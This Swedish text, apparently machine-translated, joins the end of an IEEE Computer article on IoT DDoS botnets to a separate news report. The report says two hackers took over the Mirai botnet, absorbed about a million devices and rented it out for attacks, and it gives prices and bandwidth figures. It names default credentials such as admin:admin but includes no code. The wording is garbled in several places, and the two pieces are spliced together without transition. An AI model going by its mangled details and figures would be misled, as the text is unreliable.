Vanligtvis ligger det mesta ansvaret för DDoS-attacker hos användarna och sysadminerna själva, som försummar elementära försiktighetsåtgärder. När det gäller IoT-botnät ligger dock ansvaret hos leverantörerna som släpper de svagt säkrade produkterna med fabriksinställningar för fjärråtkomst. Dessutom är det bara IoT-enhetstillverkare som har möjlighet att automatiskt tillhandahålla märkta säkerhetsuppdateringar för att skydda mot infektioner. Konventionella metoder för att öka tillförlitligheten som kräver manuell ingripande, till exempel ofta lösenordsändringar, är inte möjliga för IoT-enheter eftersom beteendet hos sådana enheter i nätverket är baserat på principen om självreglering. Därför kräver IoT idag tekniska säkerhetskontroller och robusta enhetssäkerhetsstandarder som alla leverantörer måste följa.

Jeffrey Voas ( [e-postskyddad]) - IEEE-forskare.

Constantinos Kolias, Georgios Kambourakis, Angelos Stavrou, Jefrey Voas, DDoS i IoT: Mirai och andra botnät. IEEE Computer, juli 2017, IEEE Computer Society. Alla rättigheter förbehållna. Omtryckt med tillstånd.

Förra månaden var det attacker på stora webbplatser som Twitter eller Spotify, som tillfälligt inaktiverade dem. För detta användes ett botnet Miraiförena 400-500 tusen enheter av Internet of Things. Nu har moderkortjournalister fått veta att två hackare har lyckats ta kontroll över botnet och skapa en ny version av det - det förenar redan en miljon enheter. Dess makt upplevdes av abonnenterna på den tyska leverantören Deutsche Telekom, vars nätverk var nere förra helgen.

Jakt efter Mirai

Journalisterna lyckades prata med en av dessa två mystiska hackare - han använder smeknamnet BestBuy. I en krypterad onlinechatt berättade han för dem att det fanns en verklig kamp bland hackarna för kontroll över Mirai. En sårbarhet upptäcktes nyligen i hans programvara. Dess användning, i kombination med hastighet, kunde ha gjort det möjligt för BestBuy och dess partner Popopret att ta kontroll över mycket av botnet och lägga till nya enheter till det.

Tidigare studerade våra experter koden för Mirai botnet - det visade sig att det inte skapades specifikt för IoT-enheter. Skadlig programvara söker efter enheter som är anslutna till nätverket med standardnamn och lösenord (admin: admin, root: lösenord, etc.). Detta innebär att det i teorin kan inkludera alla enheter, inklusive hemdatorer och servrar eller routrar.

IoT-enheter - vanligtvis routrar - ingår i botnet Mirai tills den startar om - då raderas masken från deras minne. Men botnet söker hela tiden på Internet efter sårbara enheter, så en "botad" enhet kan snabbt bli en del av den igen. Det finns en riktig ras bland hackare att vara de första som smittar så många enheter som möjligt.

Det finns ingen information om hur skaparna av den nya Mirai lyckas ta sig över konkurrenterna. De sa dock till reportrar att de använder sitt eget botnet för att skanna potentiellt sårbara enheter, inklusive de som tidigare var en del av botnet.

"Varför inte tvinga Mirai att jaga Mirai och konsumera originalet," säger BestBuy.

Inte bara Mirai

Men det nya botnetet absorberade inte bara gamla Mirai-enheter och nya med standardlösenord. Dess skapare utnyttjar också 0-dagars sårbarheter i IoT-enhetens firmware. Experter hade tidigare förutspått det överhängande utseendet på sådana "kombinerade" botnät.

Kampen mot dem blir märkbart mer komplicerad - om, för att konfrontera Mirai, användaren av slutanordningen själv bara behöver ändra inloggningen och lösenordet för att få åtkomst till det, kommer han inte att kunna hantera sårbarheterna i gadgeten på egen hand.

DDoS vid 700 Gbps

Hackare BestBuy och Popopret har börjat marknadsföra sina tjänster - de erbjuder tillgång till sin nya version av Mirai genom att skicka skräppost via XMPP / Jabber.

Enligt hackaren erbjuder de kunden flera servicepaket. Billigare kostnader $2 000 - För dessa pengar kan kunder hyra från 20 000 till 25 000 botnetnoder för att starta vakter i upp till två veckor med femton minuters intervall mellan attackerna. Bakom $15 000 eller $20 000 kunderna får nu 600 000 bots för att starta två timmars attacker med 30 eller 15 minuters pauser. I det andra fallet kommer attackmakten att vara 700 Gbps eller mer.

perspektiv

Säkerhet IoT-enheter är ofta på en ganska låg nivå - detta beror på att leverantörer ofta inte är intresserade av att genomföra ytterligare informationssäkerhetsåtgärder. De annonserar användarvänligheten av sina produkter, och alla ytterligare informationssäkerhetsåtgärder inför restriktioner och kräver resurser.

Som nämnts ovan kan endast utvecklare av slutpunkter eller leverantörer som tillhandahåller dem (i fallet med routrar) skydda användare från mer avancerade botnät. Påverkad av attacken av den nya versionen av Mirai har den tyska leverantören Deutsche Telekom redan meddelat att den kommer att "ompröva sin affärsrelation" med leverantörer av sårbara routrar Speedport, företag Arcadyan.

I slutändan kommer det att vara möjligt att öka säkerheten på Internet of Things genom införandet av strängare kontroll av enheter från leverantörer å ena sidan och utveckling av standarder och lagstadgad dokumentation för IoT å andra sidan. Liknande åtgärder har redan vidtagits i många länder för att säkerställa säkerheten i processkontrollsystem. De första stegen i denna riktning har redan tagits - till exempel publicerade flera IT-leverantörer i september ett dokument som heter Det industriella internetsäkerhetsramverket (IISF) - Den föreslår att tingenes internet är en del av det "industriella internet".

Men det är fortfarande långt ifrån den slutliga lösningen av frågan, och hackare BestBuy och Popopret kan få ett stort monopol DDoS-attacker uppkopplad. Detta är ett ganska sorgligt faktum, men själva knäckarna under en konversation med Moderkort förklarade att de i sin verksamhet kommer att ledas inte bara av vinst utan också av moraliska principer. Så BestBuy uppgav att de inte kommer att tillåta kunder att attackera IP-adresserna för företag som arbetar med kritisk infrastruktur.